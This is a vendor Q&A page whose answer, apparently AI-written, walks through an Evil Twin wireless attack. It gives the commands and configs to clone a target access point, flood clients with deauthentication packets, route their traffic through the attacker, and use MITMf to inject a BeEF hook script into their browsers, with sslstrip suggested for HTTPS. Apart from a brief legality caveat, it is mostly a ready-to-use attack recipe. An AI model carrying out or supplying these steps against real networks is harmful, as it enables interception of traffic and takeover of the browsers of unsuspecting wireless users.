You need to enable JavaScript to run this app.
优惠活动
大模型
产品
解决方案
定价
更多

能否结合aircrack-ng与MITMf实施Evil Twin攻击?

Alright, let's walk through how to pair an Evil Twin access point (built with the aircrack-ng suite) with MITMf to inject BeEF hooks—ditching MITMf's default ARP poisoning approach entirely. Here's a practical, step-by-step breakdown that ties everything together:

Evil Twin + MITMf: Injecting BeEF Hooks Without ARP Poisoning

1. Build Your Evil Twin AP with aircrack-ng Tools

First, we'll create a fake AP that mimics a legitimate network, then force clients off the real AP so they connect to ours. Here's how:

  • Put your wireless adapter into monitor mode using airmon-ng:
    airmon-ng start wlan0
    
    (Replace wlan0 with your adapter's actual name.)
  • Scan for nearby APs to target with airodump-ng:
    airodump-ng wlan0mon
    
    Jot down the target AP's BSSID, channel, and ESSID (network name) from the output.
  • Create a config file for your Evil Twin (e.g., evil_twin.conf) for hostapd:
    interface=wlan0mon
    driver=nl80211
    ssid=YOUR_TARGET_ESSID  # Match the real AP's name
    hw_mode=g
    channel=YOUR_TARGET_CHANNEL  # Match the real AP's channel
    wmm_enabled=0
    macaddr_acl=0
    auth_algs=1
    ignore_broadcast_ssid=0
    
    Launch the fake AP:
    hostapd evil_twin.conf
    
  • Kick clients off the real AP with a continuous deauthentication attack using aireplay-ng:
    aireplay-ng --deauth 0 -a TARGET_BSSID wlan0mon
    
    The 0 flag means non-stop deauth packets. If your Evil Twin has a stronger signal (position your adapter close to clients or use a high-gain antenna), clients will drop the real AP and connect to yours automatically.

2. Route Traffic & Prep Client IPs

Once clients are connected to your Evil Twin, you need to route their traffic through your machine and assign them IP addresses:

  • Enable IP forwarding and set up NAT to let clients access the internet through your machine (replace eth0 with your internet-connected interface):
    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
    
  • Use dnsmasq to assign IPs to connected clients. Create a config file (e.g., dnsmasq.conf):
    interface=wlan0mon
    dhcp-range=192.168.1.10,192.168.1.50,255.255.255.0,12h
    dhcp-option=3,192.168.1.1  # Set your machine as the gateway
    dhcp-option=6,8.8.8.8  # Use Google DNS, or your preferred server
    
    Start dnsmasq:
    dnsmasq -C dnsmasq.conf
    

3. Inject BeEF Hooks with MITMf

Now that client traffic is flowing through your machine, use MITMf to intercept web traffic and inject the BeEF hook:

  • First, fire up BeEF and note your hook URL (usually http://YOUR_MACHINE_LOCAL_IP:3000/hook.js).
  • Launch MITMf in transparent proxy mode to handle all HTTP traffic from the Evil Twin clients, injecting the hook:
    mitmf --transparent --inject --js-url http://YOUR_MACHINE_LOCAL_IP:3000/hook.js -i wlan0mon
    
    Skip the --arp flag entirely—since we're the default gateway for clients, MITMf doesn't need to poison ARP tables anymore.

Critical Notes to Remember

  • Signal Strength is King: Your Evil Twin needs a stronger signal than the real AP. Use a high-gain antenna or position your adapter close to the target clients to maximize success.
  • HTTPS Limitations: MITMf can strip SSL (use the sslstrip module) to handle HTTPS traffic, but modern browsers will show security warnings to users. Keep this in mind for real-world testing.
  • Legality First: Never test on networks or clients you don't own or have explicit written permission to target. Unauthorized hacking is illegal in nearly every country.

内容的提问来源于stack exchange,提问作者Steve Mucci

相关产品推荐
方舟 Agent Plan

超全模态模型 × Harness 升级,最新支持 Deepseek-V4.1-Flash、GLM-5.3 系列、Doubao-Seedream-5.0-pro、Kimi-K3 (部分), 限时 9.9 元起

最近更新时间:2026.05.12 04:34:55